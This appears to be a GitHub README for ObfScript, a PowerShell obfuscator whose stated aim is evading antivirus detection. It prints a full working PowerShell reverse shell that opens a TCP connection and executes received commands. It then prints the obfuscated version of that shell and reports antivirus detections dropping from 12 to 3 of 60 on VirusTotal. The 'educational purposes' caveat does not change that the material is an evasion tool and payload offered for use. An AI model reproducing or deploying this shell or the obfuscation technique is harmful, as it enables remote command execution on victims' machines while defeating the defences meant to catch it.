ObfScript: Windows Powershell Script Obfuscator

ObfScript is a windows powershell script obfuscator with the goal of avoiding threat detection by antiviruses. I got the idea from this article: https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Caution

this program is only for educational purposes

Warning

this program is not tested on a large number of samples and in some cases it may break your scripts. but I'm trying to fix some issues

Usage

example of obfscript usage:

python obfscript.py --add-comment --negetropy 1 --change-value --size 2000  --input  example/reverse_shell.ps1 --out example/reverse_shell.obf.ps1

flags:

-i, --input <input-file>

specifies the input file

-o, --out <output-file>

specifies the output file

-s, --size <size>

specifies the size of output file in bytes
warning: the output file size is not accurate but it tries to get close to it as much as possible

-c, --add-comment

adds random comment to output script

-v, --change-value

changes $True, $False and $null values to obfuscated form

-n, --negetropy <negetropy>

the higher the negetropy the lower the antropy. example:
this is an obfuscted object name with size of 26 and n=1:

$HRoNRKOroehmDyvzqhbzyhCltU = "something"

now this this is an obfuscted object name with size of 26 and n=5:

$LLLLLdddddHHHHHHHHHHKKKKKD = "something"

Example

this is a simple reverse shell in powershell script:

$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 3333);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
	$writer.Write("> ");
	$writer.Flush();
	$read = $null;
	while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}	
	$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
	if(!$out.equals("exit")){
		$out = $out.split(' ')
	        $res = [string](&$out[0] $out[1..$out.length]);
		if($res -ne $null){ $writer.WriteLine($res)}
	}
}While (!$out.equals("exit"))
$writer.close();$socket.close();

let's scan it with virustotal

as you can see 12 out of 60 antiviruses could detect the malware
now let's use ObfScript to obfuscate it

python.exe obfscript.py  --add-comment --negetropy 5 --change-value --size 2000  --input  example/reverse_shell.ps1 --out example/reverse_shell.obf.ps1

this is the obfuscated output we got:

$VVVVVUUUUUTTTTTIIIIIeeeeeC = new-object System.Net.Sockets.TcpClient('127.0.0.1', 3333)<#WWWWWIIIIIEEEEE#>
<#jjjjjooooobbbbb#>
if($VVVVVUUUUUTTTTTIIIIIeeeeeC -eq $(171 -as [System.DBNull])){exit 1}<#TTTTTGGGGGrrrrr#>
$TTTTTWWWWWFFFFFvvvvvgggggN = $VVVVVUUUUUTTTTTIIIIIeeeeeC.GetStream()<#jjjjjoooooccccc#>
<#fffffVVVVVppppp#>
$uuuuurrrrrGGGGGNNNNNPPPPPY = new-object System.IO.StreamWriter($TTTTTWWWWWFFFFFvvvvvgggggN)<#MMMMMdddddLLLLL#>
<#HHHHHHHHHHjjjjj#>
$lllllhhhhhkkkkkaaaaabbbbbv = new-object System.Byte[] 1024<#RRRRRWWWWWhhhhh#>
<#YYYYYpppppeeeee#>
$oooooPPPPPQQQQQnnnnnvvvvvY = new-object System.Text.AsciiEncoding<#iiiiieeeeeTTTTT#>
<#yyyyyfffffmmmmm#>
do{<#uuuuuwwwwwqqqqq#>
	$uuuuurrrrrGGGGGNNNNNPPPPPY.Write("> ")<#lllllIIIIIXXXXX#>
<#EEEEEvvvvvCCCCC#>
	$uuuuurrrrrGGGGGNNNNNPPPPPY.Flush()<#pppppBBBBBPPPPP#>
<#GGGGGIIIIIUUUUU#>
	$OOOOOuuuuuwwwwwoooooFFFFFS = $(29 -as [void])<#zzzzzgggggQQQQQ#>
<#LLLLLYYYYYIIIII#>
	while($TTTTTWWWWWFFFFFvvvvvgggggN.DataAvailable -or ($OOOOOuuuuuwwwwwoooooFFFFFS = $TTTTTWWWWWFFFFFvvvvvgggggN.Read($lllllhhhhhkkkkkaaaaabbbbbv, 0, 1024)) -eq $(function YNTBgmPDj {})){}	<#KKKKKrrrrrKKKKK#>
	$YYYYYXXXXXLLLLLTTTTTuuuuud = $oooooPPPPPQQQQQnnnnnvvvvvY.GetString($lllllhhhhhkkkkkaaaaabbbbbv, 0, $OOOOOuuuuuwwwwwoooooFFFFFS).Replace("`r`n","").Replace("`n","")<#kkkkkIIIIIEEEEE#>
<#ooooolllllWWWWW#>
	if(!$YYYYYXXXXXLLLLLTTTTTuuuuud.equals("exit")){<#iiiiikkkkkHHHHH#>
		$YYYYYXXXXXLLLLLTTTTTuuuuud = $YYYYYXXXXXLLLLLTTTTTuuuuud.split(' ')<#ttttthhhhhPPPPP#>
	        $tttttNNNNNooooorrrrrBBBBBY = [string](&$YYYYYXXXXXLLLLLTTTTTuuuuud[0] $YYYYYXXXXXLLLLLTTTTTuuuuud[1..$YYYYYXXXXXLLLLLTTTTTuuuuud.length])<#TTTTTeeeeeMMMMM#>
<#eeeeeWWWWWSSSSS#>
		if($tttttNNNNNooooorrrrrBBBBBY -ne $(138 -as [System.DBNull])){ $uuuuurrrrrGGGGGNNNNNPPPPPY.WriteLine($tttttNNNNNooooorrrrrBBBBBY)}<#cccccdddddlllll#>
	}<#VVVVVdddddWWWWW#>
}While (!$YYYYYXXXXXLLLLLTTTTTuuuuud.equals("exit"))<#kkkkkPPPPPNNNNN#>
$uuuuurrrrrGGGGGNNNNNPPPPPY.close()<#tttttwwwwwfffff#>
$VVVVVUUUUUTTTTTIIIIIeeeeeC.close()<#YYYYYiiiiirrrrr#>

let's scan it again with virustotal

now only 3 out of 60 antiviruses could detect our malware

donation

If you found this useful and would like to support, you can send donations to this XMR address: 43EfpCz23b5WPgzaw6UVnF9KsbvueFUumTuk3yMJ8acQbPPFoxgHfq6LE2qD8gNfR3j6Fzc4oGvXRCHvvfmdsYEvPtUXK2v

null-byte-00 / obfscript Goto Github PK

obfscript's Introduction

ObfScript: Windows Powershell Script Obfuscator

Usage

flags:

-i, --input <input-file>

-o, --out <output-file>

-s, --size <size>

-c, --add-comment

-v, --change-value

-n, --negetropy <negetropy>

Example

donation

obfscript's People

Contributors

Watchers

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent